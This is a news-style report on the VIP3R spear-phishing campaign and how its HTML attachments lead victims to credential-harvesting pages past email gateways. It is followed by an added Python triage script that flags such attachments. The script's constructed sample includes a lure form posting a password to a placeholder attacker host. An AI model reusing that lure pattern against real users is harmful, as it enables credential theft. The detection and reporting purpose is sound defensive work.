HTML attachments used by VIP3R spear-phishing group to bypass security

June 27, 2022

Cybersecurity researchers have discovered a spear-phishing campaign used by the VIP3R group that utilises malicious HTML attachments to attack individuals or organisations.

A recent analysis spotted the spear-phishing attack, which carries a unique signature string, DH4 VIP3R L337. The campaign also contained about 150 lures for stealing the credentials of more than 150 users at security firms and financial services companies.

Moreover, the attack used several HTML attachment payloads aimed at the targeted organisations. If the victims open the malicious HTML attachments, they are redirected to a phishing webpage that impersonates a commonly used service.

This campaign takes advantage of the fact that HTML attachments are not on the default block lists used by Secure Email Gateways (SEGs). High-end financial firms and banking institutions commonly use these Secure Email Gateways for distributing encrypted emails.

These HTML attachments are produced automatically by a sophisticated payload generator tool. The researchers could not confirm the toolkit's origin, but they are confident the attachments are generated by the VIP3R_L33T Generator.

The VIP3R-generated HTML attachments guide victims to a phishing page.

If a victim accesses the spoofed phishing page from a VIP3R HTML attachment, they are prompted to fill in the empty username and password fields in order to open the webpage.

Once the victim provides the credentials, they are automatically sent to an email address used by the threat actors. The credentials are then validated and verified on the server side using the PHPMailer library. If verification fails, an error message is sent back to the user via the browser and the user is redirected to the legitimate equivalent of the phishing page.

If the victim's email and password are validated successfully, the website redirects the client to a PDF file hosted on MS OneDrive.

This newly discovered spear-phishing attack uses a simple method to validate its targets' credentials, and the campaign can bypass SEG protection. Organisations should inform their employees and train them to spot phishing attacks in order to stay protected and limit the potential damage.
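As an added example (not code from the article or from any vendor product), a small triage script a mail-security team could run over an .eml file to flag HTML attachments showing the traits described above: a form with a password field, a form that posts credentials to an external host, or a client-side redirect. The sample message and the phish.example host are constructed placeholders.

```python
# Added triage example, not code from the article or any vendor product: flag
# HTML e-mail attachments showing the traits described above (a password form,
# a form posting credentials to an external host, or a client-side redirect).
from email import message_from_string
from html.parser import HTMLParser

class LureParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []      # URLs the form would POST credentials to
        self.meta_refresh = False   # <meta http-equiv="refresh"> redirect

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh = True

def triage(raw_eml):
    """Return {attachment filename: [indicators]} for HTML parts worth quarantining."""
    findings = {}
    for part in message_from_string(raw_eml).walk():
        name = part.get_filename()
        if part.get_content_type() != "text/html" or not name:
            continue   # an inline HTML body is normal; only named attachments count
        p = LureParser()
        p.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        hits = [label for label, hit in (
            ("password_form", p.password_inputs > 0),
            ("external_post", any(u.lower().startswith("http") for u in p.form_actions)),
            ("meta_refresh", p.meta_refresh)) if hit]
        if hits:
            findings[name] = hits
    return findings

# Constructed sample: a benign text part plus an HTML attachment whose login
# form posts the entered password to a placeholder attacker-controlled host.
SAMPLE_EML = (
    "From: sender@example.com\nTo: victim@example.com\nSubject: Shared file\n"
    'MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary="b1"\n\n'
    "--b1\nContent-Type: text/plain\n\nPlease review the attached file.\n"
    '--b1\nContent-Type: text/html; name="Invoice.html"\n'
    'Content-Disposition: attachment; filename="Invoice.html"\n\n'
    '<html><body><form method="post" action="https://phish.example/verify.php">'
    '<input name="user"><input type="password" name="pass"></form></body></html>\n'
    "--b1--\n")
```

Running `triage(SAMPLE_EML)` flags `Invoice.html` with `password_form` and `external_post`; a plain-text message with no HTML attachment returns an empty dict.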
